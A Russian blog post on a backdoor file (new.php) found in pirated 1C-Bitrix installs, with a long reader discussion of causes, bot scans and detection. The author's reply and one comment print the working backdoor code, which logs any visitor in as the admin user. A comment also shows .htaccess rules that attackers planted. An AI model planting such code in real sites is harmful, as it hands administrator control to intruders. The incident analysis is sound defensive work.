Бэкдор во взломанном 1С-Битрикс: под угрозой сотни сайтов / forpes.ru

Главная
Бэкдор во взломанном 1С-Битрикс: под угрозой сотни сайтов

Бэкдор во взломанном 1С-Битрикс: под угрозой сотни сайтов +8

27.02.2021 21:43

evgeniymx 119 16500 Источник

Субботний вечер омрачен скандалом: сайт не работает, админы - негодяи, а сервера - решето. Вызов принят, или почему при всей нелюбви к 1С-Битрикс в данной ситуации пострадали не только лишь все?

Какое-то время назад некоторые пользователи начали сообщать о том, что их любимый сайт взломан, в лучшем случае он просто не работал, в худшем - показывал рекламу средств для улучшения KPI. Пока это были единичные случаи, но после 3-4 однотипных взломов на разных платформах уже есть основания полагать, что где-то закралась дырка, которую активно эксплуатируют.

Вообще, взлом CMS это не такая редкая штука. Постоянно то и дело появляются разные нескучные уязвимости которые эксплуатируют все, кому не лень. Сложнее всего тогда, когда компоненты сайта, которые построены на каких-либо массовых платформах не обновляются, их взламывают, и хуже, когда это происходит массово. Но по специфике работы не привыкать к анализу таких проблем, выяснением "кто виноват" и самое важное тут убедиться в том, что дело именно в сайте.

Анализируя содержимое сайта, что первое бросается в глаза, так это наличие нехарактерного мусора:

Таких файлов, как правило, быть вообще не должно. Хорошо, смотрим на дату создания таких файлов и лезем в логи для анализа что происходило на сайте в какой-то промежуток времени. Тут всё оказалось проще, чем хотелось бы:

Видно простой перебор файлов по словарю. Все запросы летят с одного IP, а главное, видно файл new.php, который вместо 404 вернул редирект 302, и сразу после этого видим POST на /bitrix/admin. Вау! Что же это такое?

А это - красота:

Те, кто хоть раз в жизни писал код для битрикса, сразу же поймет что этот код делает. А кто не писал, то всё просто: делает авторизацию под пользователем с ID=1, который как правило является админом сайта.

Пробегаемся поиском по паттерну и находим сразу три таких файла с одинаковым содержимым:

bitrix/admin/mobile/new.php
bitrix/tools/new.php
bitrix/new.php

Хэш - 1964d7215f3944fa7a086d590b02152c

Все одинаковые, все делают одно и то же. Удаляем их, откатываем сайт из бэкапа, проверяем что в системных файлах битрикса ничего лишнего нет, и на всякий случай откатываем БД - вдруг там тоже есть что-либо лишнее.

Почему не только лишь все?

Проанализировав все случаи взлома был получен неутешительный вывод: все те, кого взломали, использовали хакнутый Битрикс. Да, Вы не ослышались - вечной демо-версией продукта уже никого не удивишь. Мало того, что это нарушение авторских прав, так ещё и так подвергать свой бизнес опасности взлома обычным ботом. Надо уметь!

Держите свои сайты в безопасности и не позволяйте случаться таким неприятным ситуациям.

Комментарии (119)

splatt
28.02.2021 00:48
#22743910
Классика жанра, не?
1. evgeniymx Автор
  28.02.2021 01:06
  #22743964
  Самая, что ни на есть. Проблемы с битриксом появляются чаще, за 2 года уже третья как минимум. Не говоря уже о том, что многие забывают про такие базовые меры предосторожности, как restore.php в корне сайта. Но такие случаи интересны — бэкдор в битриксе встретишь не часто, и очень хорошо, что всех объединил общий фактор.
  
  А вот грамотность обслуживания сайтов хромает — никто не задается вопросом проблем с обновлением от разработчиков, как на том же условном битриксе, так и на других cms типа wordpress/joomla и тп.
  1. splatt
    28.02.2021 02:30
    #22744128
    +1
    Я имею ввиду классика — скачанные с торрентов пиратские версии CMS, форумных движков итд, где через N месяцев обнаруживаются бэкдоры, зашитые авторами торрентов. К моменту когда торрент удаляется, в зависимости от навыков автора, у него тысячи скачиваний и сотни сайтов с владельцев которых можно вымогать деньги. Ну а потом бэкдор уходит в паблик
    
    По моему этим в середине / конце 2000ых болели половина форумов на IPB, vBulletin, XenForo и другие фан сайты на платных движках где владельцы просто не могли себе позволить лицензию в сотни долларов.
    
    Ну а сегодня просто желание сэкономить
    
    symbix
    28.02.2021 04:12
    #22744274
    +1
    Пиратская версия с подарочком — это классика жанра задолго до веба, ещё на bbs-ках водилось во времена ms dos. Ну или из этого века — на торрентах был пиратский iWork в немного расширенной поставке, никого же не удивляет, что при установке iWork макось спрашивает пароль для получения рутовых прав.
  1. tankistua
    28.02.2021 07:57
    #22744390
    Вордпресс давно обновляется сам, это модно конечно отключить — но кто нажмет лишнюю кнопку.
    
    Перед битриксом поставить нжинкс например и эти редиректы заредиректить на главную например
    
    KlVV
    28.02.2021 14:15
    #22745428
    Редирект в данном случае это пижонство и удобство. Даже без него багоюзер получает админскую куку и в админку может зайти уже и руками.
  1. vovasik
    28.02.2021 12:55
    #22745068
    +1
    Ну вот попрошу без грязи. Если в Битриксе обновления безопасности не устанавливаются автоматически без участия пользователя не значит что в других cms все так же плохо
  1. 0x131315
    28.02.2021 14:14
    #22745424
    +1
    Интересно, что никто не делал публичный анализ ядра битрикс. Возможно там этих бэкдоров ведрами черпай.

damewigit
28.02.2021 01:50
#22744066
Так а backdoor где? Пока я вижу две проблемы
— вебмастера оставляющие такие файлы в корне продакшен серверов
— CMS которая отказалась от Frontcontoller подхода (дефакто стандарта в мире PHP) и дает злым дядям грузить и запускать что угодно из паблик директории
1. evgeniymx Автор
  28.02.2021 01:56
  #22744078
  файл new.php с кодом:
  
  <? require($_SERVER["DOCUMENT_ROOT"] . "/bitrix/header.php"); global $USER; $USER->Authorize(1); LocalRedirect(“/bitrix/admin/”);
  
  в стандартном дистрибутиве его нет, в проблемных он был в трех экземплярах раскинут по разным папкам (но у всех одинаково), что наводит на мысли о том, что используемый дистрибутив был скачан вместе с ними.
  
  при этом взломанные сайты между собой никак не связаны, у них разные владельцы, разные разработчики, короче всё разное, кроме пары общих факторов.
  1. silent_jeronimo
    28.02.2021 02:53
    #22744180
    +4
    кликбейтный заголовок.
    
    Потому что по сути «Пиратский Битрикс содержит бекдор».
    
    И тогда никакой новости не будет, не так ли?
    
    evgeniymx Автор
    28.02.2021 03:44
    #22744244
    Проблема в том, что многие массово используют этот самый пиратский битрикс с возможной дырой. Не так много, как те, кто использует его легально — но я столкнулся не с 5 и даже не с 20 случаями взлома через эту дырку.
    
    А так да, основная дырка тут не бэкдор, а желание сэкономить, как сказали выше.
    
    KlVV
    28.02.2021 14:16
    #22745432
    +4
    Проблема в том что жадные заказчики нанимают тупых и ленивых исполнителей.
    Заказчики жадные потому, что нанимаю за еду и бледнеют когда им озвучивают стоимость лицензии.
    Исполнители тупые потому, что ленятся даже движек сами скачать и взломать, это несложно и есть руководство. И ленивые потому что в голову им приходит просто проверить файлы на строчку autorize(1). Это самая простая закладка в Битриксе.
    И кстати как результат все наказаны. Исполнители получают за работу еду вместо денег. Заказчик взлом вместо рабочего сайта.
    
    vanxant
    28.02.2021 15:03
    #22745618
    Причем сканер уязвимостей самого битрикса отлавливает такое. Но его ж блин надо иногда запускать!
    
    evgeniymx Автор
    28.02.2021 16:28
    #22745976
    А кто этим должен заниматься? Владелец сайта? Разработчик? Хостер? Датацентр?
    
    mSnus
    28.02.2021 19:45
    #22746448
    Не отлавливает в большинстве случаев. Откуда ему знать, что Васин компонент, переопределяющий шаблон стандартного элемента каталога, содержит лишнюю строку с инклюдом шелла?
    
    Поэтому и пришлось писать свой сканер.
    
    RASUKALENGLY
    28.02.2021 20:08
    #22746524
    проверьте ваши личные сообщения пожалуйста)
    
    Bender_Render
    28.02.2021 17:50
    #22746172
    Цена вопросаинрает свою роль, есть заказчики с условной 1000р, хочешь делай, не хочешь не делай.
    
    askunash
    02.03.2021 09:13
    #22752780
    Так всё. Именно стоимость лицензии как признак платежеспособности клиента.
    
    evgeniymx Автор
    28.02.2021 05:10
    #22744304
    Заголовок действительно вышел кликбейтным, к битриксу в легальном виде данная проблема маловероятно имеет какое-либо отношение, поэтому чутка подправил
    
    Lord_Ahriman
    28.02.2021 09:21
    #22744496
    +5
    Очень неудачно подправили. Я зашел почитать про «хакеров», которые взломали Битрикс (а кавычки я воспринял так, что кто-то просто заюзал недокументированное что-то или малоизвестное, т.е. это не настоящий взлом), а оказалось что в крякнутый Битрикс всего лишь засунули бэкдор пираты. Писали бы тогда «Бэкдор в крякнутом/пиратском Битрикс», и было бы сразу понятно.
    Уверен, что не один я неправильно понял ваш новый заголовок.
    
    mSnus
    28.02.2021 13:46
    #22745326
    Не пиратский, а «давно не обновляемый» тоже содержит этот бэкдор. С обновлением связано много рисков, в статье писал.
    
    horses
    01.03.2021 08:00
    #22747868
    Этих файлов там не было ни в какой версии битрикса. Либо их руками кто-то разместил (что мало вероятно, когда такие файлы имеются на кучи не связанных установок), либо скачана такая сборка (но как автор сказал, что все версии не были лицензионными)
    
    mSnus
    01.03.2021 08:02
    #22747872
    Через бэкдор закачивается шелл и ещё куча всего, в том числе эти файлы.
    Ещё десяток вспомогательных временных создаётся, потом обнуляется… там много разных процессов идёт.
    Отловленные файлы я выложил архивом на Гитхаб туда же, куда и сканер (линк ниже был)
  1. damewigit
    28.02.2021 15:44
    #22745798
    libramedia.ru/blog/1s-bitriks-avtorizacziya-bez-parolya
    
    Знакомый код, да? Это код который вы могли скопипастить из первых 10 страниц гугла, по запросу: «Битрикс скрипт авторизации без смс и регистрации». Сейчас ситуация лучше и стали добавлять строчку
    
    @unlink(__FILE__);
    
    Но раньше, никто не парился, и этот код
    
    Почему у 3 разных заказчиков этот файл в одних и тех же местах? Хороший вопрос, но очень сомневаюсь что его положили туда злоумышленники, скорее всего встроили бы прямо в код ядра бекдор и бекдор бы поумнее заюзали.
    
    horses
    01.03.2021 08:02
    #22747870
    А кто же его туда положил? :-) Положить файл похожий на настоящий просто автоматически, чем пытаться встроиться в код ядра. Тем более, если любое обновление его может перетереть.
1. Iv38
  28.02.2021 03:26
  #22744220
  Если проблема действительно в том, что кто-то распространяет пиратскую версию CMS с бэкдорами, то единая точка входа никак не поможет. Да и от забытого вебмастером отладочного скрипта тоже.
  1. damewigit
    28.02.2021 15:53
    #22745840
    При реализации Front Contoller, все запросы идут в один файл, условно
    
    index.php
    
    Даже если строка запроса будет такой:
    
    /test.php
    
    Запрос придет в index.php и там обработается роутером приложения, так работает весь адекватный веб на php и большая часть топ5 фреймворков. У вебмастера просто не получится там что-то оставить на диске, так как напрямую файлы с диска не грузятся, и уж тем более не инетрпитируются.
    
    А разрешать грузить что угодно на диске, это довольно рисковый подход
    
    sumanai
    28.02.2021 23:37
    #22747152
    При реализации Front Contoller
    
    В битриксе нет единой точки входа.
    
    damewigit
    28.02.2021 23:38
    #22747158
    Да, я об этом писал выше
    
    CMS которая отказалась от Frontcontoller подхода (дефакто стандарта в мире PHP) и дает злым дядям грузить и запускать что угодно из паблик директории
    
    Apokalepsis
    28.02.2021 23:56
    #22747216
    В новой версии Битрикс он уже есть.
    
    sumanai
    01.03.2021 00:14
    #22747252
    Я застал ещё 20-ю. И там нифига не было, кроме VUE, патченного.
    
    Apokalepsis
    01.03.2021 00:18
    #22747262
    +1
    Вышел в одной из последних. Надо в код лезть, с ходу точную версию не могу сказать. Я правда ещё бетами пользуюсь, поэтому могу ошибиться — в продакшене или ещё нет. По умолчанию используется urlrewrite, но можно переключится на почти нормальный роуминг. За основу был взят симфоневский. Разработчики о нем раскалывали то ли на прошлой конференции, то ли на позапрошлой.
    
    sumanai
    01.03.2021 00:27
    #22747292
    Окей, интересно!
    
    За основу был взят симфоневский.
    
    Интересно, они его тоже переписали? Когда я в последний раз работал с этим продуктом, composer предполагался только для пользовательского кода.
    
    VStepankov
    04.03.2021 14:20
    #22764466
    +1
    Ужа с ежом там скрестили, как всегда
    https://youtu.be/1_xYUQzQHj8?t=1244
    
    Как при этом партнёры будут переучивать нынешних разрабов, которые привыкли там index.php, тудам index.php и в продакшен — я слабо представляю
    
    sumanai
    04.03.2021 15:31
    #22764848
    ?Нас просили не менять. Мы прислушались и изменили :)
    
    Как мне перестать смеяться?
    
    Как при этом партнёры будут переучивать нынешних разрабов
    
    Лет через 5 войдёт в обычную практику. Там скорее с новыми разрабами, которые ещё не забыли хорошие приёмы программирования.
    
    VStepankov
    04.03.2021 16:23
    #22765118
    Очень сомневаюсь, что там есть приток свежей квалифицированной крови.
    Как минимум, на такие мысли наводит вал довольно печальных публикаций в стиле «Как круто работать с Битриксом/Битрикс FW»
    
    sumanai
    04.03.2021 16:34
    #22765166
    Ну человек может придти в Битрикс сразу после института, а там могли нормально преподавать. Да и я знаю реально крутых программистов на Битриксе, которые честно стараются следовать новым практикам, насколько это позволяет Битрикс конечно же ))
    
    vyacheslavchulkin
    03.03.2021 22:33
    #22761774
    Плюс ещё проблема в том что контент менеджер может лёгким движением руки вставить любой код в подключаемую область и это никто не заметит. Я когда это увидел первый раз очень удивился.
    
    Iv38
    01.03.2021 07:00
    #22747788
    Да это-то понятно. Но если есть возможность впихнуть бэкдор в дистрибутив, тот же самый код можно запихнуть в код любого подключаемого файла ядра CMS, где проанализировать параметры запроса и выполнить авторизацию.
    
    damewigit
    01.03.2021 07:03
    #22747792
    Да, это было бы логичнее и в случае с битриксом, будь тут злой умысел (распространить взломанный битрикс с бекдорами), хакеры бы действовали элегантнее. Вероятно просто кто-то оставил эти файлы для своих нужд случайно, а потом возможно поделился на файлпомойке «крякнутым» битриксом с другими
    
    Iv38
    01.03.2021 07:24
    #22747812
    Может и так. Но часто такие файлы попадают через взломанный FTP, через дырявый хостинг (у меня был случай заражения из-за недостаточной изоляции сайтов на шареде), через забытые отладочные инструменты, через дырявые формы, позволяющие залить любой файл в директорию доступную веб-серверу. Почти на любом сайте в логах можно увидеть такие запросы. И против этого единая точка входа действительно помогла бы, хотя бы частично.
    
    evgeniymx Автор
    01.03.2021 11:25
    #22748542
    Классический шаред хостинг предусматривает только изоляцию аккаунтов на сервере. Изоляцию сайтов предоставляют немногие, за что им респект, но отсутствие изоляции сайтов на уровне аккаунта само по себе дыркой не является. Если сайты взломали из-за одного дырявого сайта на аккаунте, то причем тут хостер? Виноват исключительно хозяин сайтов, тут без обид.
    
    Вот если Вас поломали из-за соседа на сервере, то это дырявый хостинг.
    
    Iv38
    01.03.2021 21:14
    #22751558
    Между аккаунтами, конечно

XanKraegor
28.02.2021 03:32
#22744230
«Один IP» назвать можно?
Ну и вообще интересно было бы услышать подробности. В официальном (не спираченном) дистрибутиве new.php в указанных местах нет, но теоретически их можно было и получить из-за какой-то массово проэксплуатированной уязвимости. Реакции от 1С на «скандал» нет?
1. evgeniymx Автор
  28.02.2021 03:46
  #22744248
  Выше я говорил об этом, что в оф редакции битрикса таких файлов нет, и не было в принципе. Айпи самый обычный digital ocean, не думаю что есть смысл его раскрывать — таких тысячи, да и многие ищут уязвимости через уязвимости. Как например взломанный вордпресс может сканить другие вордпресс сайты на предмет наличия уязвимостей
1. minimels
  28.02.2021 12:28
  #22744962
  «Какой скандал? Где?» — 1С про это ничего не слышал))
  Это примерно то же самое, как они не слышали про то, что Битрикс генерирует сам кучу лишнего html кода при оформлении страницы…
  Та и не свойственно большим компаниям с российскими корнями что-то признавать. АВОСЬ само рассосется!
1. horses
  01.03.2021 08:05
  #22747876
  А какую реакцию вы ожидаете? Это все равно что ждать реакции официальной от ауди или теслы, что угнанный, сваренный в гараже из трех тотальных авто их автомобиль взорвался в дтп и там погибли люди. Понятно, но производитель то тут при чем?
  1. XanKraegor
    01.03.2021 16:10
    #22750244
    В тексте посыл о пиратской причине «уязвимости» подается как предположение, а не как доказанное утверждение.
    Соответственно, пусть небольшая, но существует вероятность того, что дело в чем-то другом. «Что-то другое» может быть только эксплуатацией уязвимости уже в официальном коде.
    Например, недавно Битрикс стал просить обновиться до php 7.4 с более ранних версий. Допустим, народ обновился, но оставил некоторые небезопасные настройки, что могло быть причиной уязвимости.
    
    horses
    01.03.2021 22:34
    #22751864
    Да, это предположение, но сделанное на основе наблюдений, что все взломанные порталы были пиратскими. Весьма веский довод. Было бы желание, можно было бы найти более весомые доказательства этому.
    А предположение об уязвимости в коде ни на чем вообще не основано. Нет никаких предпосылок к этому вообще.

GennPen
28.02.2021 03:46
#22744250
-1
А зачем админку открывать для левых IP-адресов?
1. mrBarabas
  01.03.2021 11:25
  #22748546
  Тут все просто, обычно нанимают «низкоквалифицированных специалистов» для разработки, покупают «недорогой» хостинг… лишь бы подешевле… в итоге сайт дырявый, контроля за правами и авторизацией никакого нет, но как говорится скупой платит дважды и его это устраивает

olehorg
28.02.2021 11:31
#22744752
у 1С в последнее время сильно поменялось видение того что компания может позволить себе с владельцами «хакнутых» продуктов. Следующим шагом будет автоматическое создание платежных поручений в пользу 1С в стандартной клиент-банковской обработке.

BasilioCat
28.02.2021 11:38
#22744784
Указанные файлы вполне могли быть залиты в результате эксплуатации другой уязвимости, как заложенной пиратами, так и просто присутствующей в старой и не обновляющейся версии Битрикса. И для однозначного утверждения, что этот файл положили злые пираты, нужно было найти эти файлы в пиратском дистрибутиве. Ну а для поиска «уязвимостей» в исходном коде есть diff — никто не мешает сделать дифф на пиратский и оригинальный битрикс, благо «достать» оригинал несложно, он не зашифрован и не обфусцирован
1. evgeniymx Автор
  28.02.2021 12:58
  #22745082
  -1
  Таки нет, так-как
  1) во-первых, версии взломанных были разными, и не самыми древними
  2) в некоторых версиях ядро битрикса (то, где проверяется лицензия) — закодировано (точно не помню, в каких и до каких)
  3) ну и анализ диффом это весьма длительная задача для битрикса, учитывая его иерархию. Безусловно, можно быстро отсеить все что одинаковое и анализировать что отличается, но… зачем столько чести для взломанного битрикса? Будь это лицензионный, то да, можно провести более доскональное расследование. Хотя у битрикса нет репо, где можно найти любую версию, чтобы поиск был наиболее грамотным.
  
  Но Ваше предположение выглядит корректно, возможно найденные файлы лишь часть проблемы.
  1. unsignedchar
    28.02.2021 14:40
    #22745520
    ну и анализ диффом это весьма длительная задача для битрикса, учитывая его иерархию.
    
    -r, --recursive recursively compare any subdirectories found
    
    evgeniymx Автор
    28.02.2021 14:44
    #22745542
    Повторюсь — нет архива версий, чтобы сравнение было правильным. В битриксе с его кодом, я уверен, на каждую минорную версию приходится столько исправлений, от которых никакой анализ не поможет. Что говорить о мажорных. Пройдемся рекурсивно диффом, увидим не одну тысячу изменений из которых 999 — сделаны разработчиками.
    
    unsignedchar
    28.02.2021 15:35
    #22745756
    +1
    Я человек, измученный git'ом… Я догадывался, что в мире bitrix всё сложно… Но что невозможно восстановить исходный код продукта по версии — это как-то совсем сложно.
    
    evgeniymx Автор
    28.02.2021 16:26
    #22745968
    Возможно внутри систем битрикса они юзают что-либо вроде git, но публичных репо точно нет. Либо я плохо искал
    
    unsignedchar
    28.02.2021 16:58
    #22746054
    Я имел в виду, разве по версии битрикса невозможно найти архив с релизом? Или хранение собственных релизных версий производитель не практикует?
    
    evgeniymx Автор
    28.02.2021 17:25
    #22746120
    -1
    Сложно сказать, вроде бы при установке битрикса устанавливается актуальная версия и иных вроде как не предусмотрено соответственно и найти тот самый архив проблематично.
    
    unsignedchar
    28.02.2021 17:38
    #22746146
    Пнятненько :(
    
    mSnus
    28.02.2021 19:58
    #22746498
    Кроме ядра Битрикса есть ещё отдельные страницы — каждая тоже php файл и есть шаблоны и кастомное переопределение стандартных компонентов Битрикса — тоже с кучей php, перемешанного с html. )))

dopusteam
28.02.2021 11:39
#22744790
Предлагаю поменять в заголовке 'под угрозой сотни сайтов' на 'под угрозой миллионы сайтов', почему бы и нет?
1. evgeniymx Автор
  28.02.2021 12:58
  #22745086
  Потому что на удивление взломанный битрикс использует меньше людей, чем не взломанный

IgorAlentyev
28.02.2021 12:27
#22744954
+2
Как то очень странно. Знаю 2 способа взлома лицензии битрикса. 1ый через ежемесячное обновление хешей в бд, второй через изменение нескольких строк в хитро обусфицированном файле. Но ни один не подразумевает использование таких файлов или изменения прав доступа или еще чего то подобного.

Так что есть немалая вероятность что непосредственно для загрузки этих файлов использовалась какая то другая уязвимость, которую неплохо было найти.

А так пост выглядит как будто автор был рад свалить все на взломанный битрикс и не копать дальше.

Как вариант конечно что битрикс был скачан у пиратов с уже зашитым бекдором, но там совсем древние версии и раз люди не смогли сами сделать довольно простой взлом то ну как бы туда и дорога. Либо делать нормально самому либо платить за лицензию.
1. horses
  01.03.2021 08:08
  #22747878
  Могли скачать древнюю версию и обновиться до актуальной. Почему нет?
1. vyacheslavchulkin
  03.03.2021 22:43
  #22761816
  Да там не очень хитро, include.php, делов на 15 минут, когда замучился каждые 30 дней танцевать с бубном для локальной разработки на каждом проекте, то пришел к выводу что быстрее расшифровать и сделать "пиратку" для дева, так быстрее. Меня удивляет что в Битриксе видят процесс разработки только одним человеком и дают на лицензию только одну копию для дева, у них там вообще свои взгляды на жизнь, которые часто не стыкуются с реальностью.
  1. IgorAlentyev
    04.03.2021 12:05
    #22763714
    Я примерно так же к этому пришел) Потом ещё узнал что в сети есть этот файлик в нормальном виде и там ещё проще все.
    
    Согласен, бред полный. У меня сейчас новый сайт в разработке и нужно закрывать публичку чтобы не забанили, бред какой то.

tty01
28.02.2021 12:28
#22744966
+1
Вот это «новость»! Оказывается, пиратский софт содержит бэкдор!

habakvak
28.02.2021 12:41
#22745012
Столкнулись с подобным случаем примерно 1 неделю назад.
При этом у людей лицензия есть.(пока не вижу подтверждения про пиратский bitrix)
Работа бота очень странная, у нас, например, бот также перебирал имена и нашел файл с авторизацией, но при этом не сразу запустил /bitrix/admin/php_command_line.php.
Файл с авторизацией( если полагаться на дату, что не очень правильно) был создан более года назад:
```
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php");                                                                                                                                                         
                                                                                                                                                                                                                   
use Bitrix\Main,                                                                                                                                                                                                   
    Bitrix\Main\Application,                                                                                                                                                                                       
    Bitrix\Main\Loader;                                                                                                                                                                                            
    ?>                                                                                                                                                                                                             
                                                                                                                                                                                                                   
<?                                                                                                                                                                                                                 
$USER->Authorize(1);                                                                                                                                                                                               
?>                                                                                                                                                                                                                 
                                                                                                                                                                                                                   
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");?>                                                                                                                                                       
```
Далее через сутки этот же бот почему-то проходит все файлы снова.
На глаза попался адрес 3l.l72.225.2ox, уже неделю ходит на сайт зараженный и перебирает файлы.
Скорее всего несколько личностей ломают сайт(ы), так как есть фиксация в логах другого поведения по «бекдорам».(например, настырное изменение htaccess)
<FilesMatch ".(phtml|php|PhP|php5|suspected)$"> Order Allow,Deny Deny from all
<FilesMatch "(index).php$">
Order Allow,Deny
Allow from all

<FilesMatch "(wp-load).php$">
Order Allow,Deny
Allow from all

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ — [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule. index.php [L]
1. evgeniymx Автор
  28.02.2021 12:51
  #22745056
  Интересно, а название файла какое было?
  1. habakvak
    28.02.2021 13:19
    #22745176
    Название файла было /test.php. (возможно это разработчики оставили)
    Также наблюдается сканирования с 79.l35.82.lx (вот с этим адресом можно уже проводить мероприятия. Вредитель за ним или зараженный, вот вопрос?)сегодня на 2-х разных сайтах(такой же перебор файлов).
    
    evgeniymx Автор
    28.02.2021 13:31
    #22745242
    test.php тоже перебирается
    
    вероятно бот просто по паттернам перебирает всё что может перебрать, а new.php был остановлен задолго до него кем-то. О чем я и предположил, что они не связаны между собой (скорее всего).
    
    habakvak
    28.02.2021 13:37
    #22745284
    Ага скрипт перебирает по списку файлов в /, /bitrix и /bitrix/admin.
    А в ваших многих случаях какие решения(шаблоны) на сайтах используются? Они разные или одного производителя?
  1. alex1478
    28.02.2021 15:01
    #22745602
    Может эти файлы делали сами владельцы сайтов по гайдам «как восстановить админский пароль от битрикис»
    
    evgeniymx Автор
    28.02.2021 15:04
    #22745622
    Разные владельцы и три файла в bitrix — сомнительное совпадение
1. mSnus
  28.02.2021 13:56
  #22745360
  Товарищи, там не один этот бот. Его кусок работает с Amazon AWS, и ищет он, как я понял, в том числе старые закладки.

sitecenters
28.02.2021 12:44
#22745028
+3
Автора на костер за такие заголовки. С таким же успехом можно поставить Jailbreak на iPhone, поставить ломаный софт, который окажется с сюрпризом в виде утечки данных пользователя. И что теперь, бэкдор в iPhone?

vviz
28.02.2021 13:11
#22745146
Может немного не в тему, но разве не нужно анализировать лог демонов и блокировать плохишей на уровне IP? Сделал IP 5 «нехороших» запросов — в бан-лист.
1. habakvak
  28.02.2021 13:24
  #22745202
  +1
  Грань между нормальным запросом и «нехорошим» сложно найти.
  Если ты не разрабатываешь сайт и не сопровождаешь его всегда.(это же не SQL inject были)
  1. vviz
    28.02.2021 13:36
    #22745276
    Разве статус возврата демона «404» не явный показатель «нехорошести»?
    
    habakvak
    28.02.2021 13:42
    #22745306
    Не хочу полемику разводить. Но ответ 404 не значит, что это «нехорошо».
    Конечно можно сделать белый список для серверов bitrix, но эти самые сервера сканируют сайты на наличие файлов, которые считают не нужными на рабочем сайте. Например, restore.php (типичный сканер безопасности bitrix).
    
    horses
    01.03.2021 08:10
    #22747884
    Ну поменяете вы на сайте часть разделов. Или удалите часть каталога. И у вас пачками в бан улетят поисковые роботы.
1. evgeniymx Автор
  28.02.2021 13:36
  #22745272
  Будет слишком много ложнопозитивных банов
1. mSnus
  28.02.2021 14:01
  #22745382
  на shared-хостинге?

udjin123
28.02.2021 13:17
#22745162
+1
Как Битриксоид с большим стажем, скажу что часто этим и сами программисты грешат, кладут такой бэкдор. Чаще всего фрилансеры такое делают.

mSnus
28.02.2021 13:40
#22745292
+2
О, так моя статья и «антивирус» — как раз про этот бэкдор. Знакомые файлы!

Берите скрипт-сканер, пользуйтесь:
habr.com/ru/post/543906
Скрин для примера
1. xRay
  02.03.2021 11:13
  #22753180
  \d не достаточно т.к. есть еще вариант Authorize(true)
  habr.com/ru/post/544572/#comment_22753044
  
  mSnus
  02.03.2021 11:33
  #22753256
  спасибо большое, добавлю. Сейчас посмотрю, где вообще используется Authorize
  
  UPD: мда, там куча конструкций вида $oAuthManager->Authorize($_REQUEST["auth_service_id"])… надо разобраться, как это работает и насколько уязвимо.
  
  unsignedchar
  02.03.2021 11:54
  #22753378
  Так в php есть 100500 способов сформировать !0 или true. И еще больше способов закодировать Authorize.
  
  mSnus
  02.03.2021 12:45
  #22753636
  Серьёзный антивирус должен был бы работать по-другому, это и сомнений не вызывает. Но эти вирусы тоже пишутся на коленке, поэтому есть шанс ловить их простыми regexp-ами, что я и сделал.
  
  С Authorize я надеялся, что он вызывается достаточно редко вообще, но увы. Придётся ловить по \$USER->Authorize\([^\$], и дальше как обычно разбираться руками, что там за фигня творится.
  
  Битрикс так написан, что код его исходников иногда сложно отличить от кода вируса.

lexnekr
28.02.2021 16:05
#22745894
Бэкдор может не иметь отношения ни к отсутствию обновлений, ни к «вечному демо». Обычно такой мусор появляется на сайте после подбора пароля к ftp.
Хотя да, в данном случае кто-то залил бэкдор, заточенный под битрикс почему-то.
Обычно даты создания таких файлов не соответствуют реальному времени создания.
И обычно файл сперва заливается, «настаивается», и только спустя время эксплуатируется.

Так что заголовок действительно кликбейт. Так же можно написать «под угрозой миллионы сайтов с php» или «под угрозой миллионы сайтов с ftp».

Spy_W
28.02.2021 16:26
#22745970
Скорее всего проблема не в пиратской версии, а в уязвимости движка.

Только на днях было несколько случаев:
файлы с таким же именами;
отредактированный .htaccess;
скриншот обфусцированного кода из index.php.

Все были на лицензии (но без обновлений разное время), располагались как на хостинге, так и на vps.
1. evgeniymx Автор
  28.02.2021 16:27
  #22745972
  Это очень интересно, потому что в моей выборке все были без лицензии. А если кто-то сталкивается с этой проблемой НА лицензии, то тут реально надо анализировать глубже, как писали люди выше.

Spectre
28.02.2021 18:07
#22746226
все что на скриншоте — следствие угнанной админки сайта (admin admin или подобное) и возможности загрузить файл через эту админку

"бэкдор" этот кроссплатформенный и чаще всего заражает modx
1. silent_jeronimo
  28.02.2021 19:30
  #22746422
  У модикса часто открыта наружу папка с плагинами для админки. А в разных плагинах есть разные уязвимости, типа загрузки произвольных файлов например.
  
  А старые плагины так просто ещё не обновишь, бывает: поддержка прекращена, прочее.

vitalikone1
28.02.2021 20:08
#22746526
Не соглашусь, дело не в «пиратском взломанном» ядре. На днях случилось тоже самое с абсолютно лицензионным сайтом, лицензию которой стабильно продлевают, но подозреваю, что проблема как раз-таки была в формах обратной связи, формы подписки, которые не были защищены от банальных SQL инъекций.
Почистили через модуль сканер и исправили все ошибки выявленные при проверке сканером безопасности. На данный момент всё в порядке и больше новых файлов не создавалось, но будем наблюдать…
1. evgeniymx Автор
  28.02.2021 20:14
  #22746534
  Если это действительно так, то дело куда печальнее, на самом деле. А какие версии битрикса и этих модулей были у сайтов, которые взломали?
  1. vitalikone1
    28.02.2021 20:31
    #22746570
    Не самый старый, но и не новый — БУС 20.0.0
  1. vanxant
    28.02.2021 22:15
    #22746932
    В стандартных компонентах обратной связи и подписки никаких SQL инъекций нет. Скорее всего, самопал какой-то был.

zorn_v
28.02.2021 22:14
#22746928
Странное категоричное заявление "полюбому пиратский битрикс".
Почему не "в дырявый битрикс залили шелл" ?

ЗЫ. Наверное надежда что 1С вас заметят? )))
ЗЫЫ. Вы избавились от последствий, а не от причины
1. vanxant
  28.02.2021 22:16
  #22746944
  Потому что сам по себе битрикс достаточно защищён. Как-правило, ошибка в чьих-то кривых ручонках на месте, типа 20 сайтов на одной учётке шаред-хостинга.
1. evgeniymx Автор
  01.03.2021 01:35
  #22747460
  Я не могу утверждать что битрикс дырявый. По роду деятельности я могу быть уверенным, что уязвимости может иметь любой софт, другой вопрос, как быстро их заметят. Вордпресс взламывают, потому что он массовый и всем интересно аудитить плагины с миллионами установок. Битрикс интересен 3.5 анонимусам, и иногда что-нибудь с ним всплывает.
  
  Но на моей памяти фактов взлома регулярно обновляемого битрикса с легально купленной лицензией не было. Поэтому склонен полагать так, но при этом не являюсь ни разработчиком битрикса, ни тем, кто хотел бы быть замеченным этой компанией.
  1. zorn-v1
    01.03.2021 11:26
    #22748556
    > Битрикс интересен 3.5 анонимусам, и иногда что-нибудь с ним всплывает.
    
    Ошибка выжившего. Сканерам уязвимости пофиг битрикс у тебя или какой нибудь экзочиский xoop. Что загружено то и сканит )

